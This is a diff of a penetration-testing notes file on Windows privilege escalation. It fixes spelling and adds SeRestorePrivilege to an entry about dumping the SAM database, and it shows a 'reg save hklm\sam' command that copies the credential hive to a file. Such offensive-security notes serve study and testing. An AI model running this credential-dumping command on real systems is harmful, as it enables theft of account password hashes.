can-ozkan/PenetrationTesting/PrivilegeEscalation/WindowsPrivilegeEscalation.md

 # 28. SAM Dump with SeBackupPrivilege

-If a comprimised user has SeBackupPrivielege, the attacker can dump the SAM database used by the LSASS process.
+If a compromised user has SeBackupPrivilege and SeRestorePrivilege, the attacker can dump the SAM database used by the LSASS process.

 ```
 reg save hklm\sam C:\Users\<username>\Desktop\SAM.hive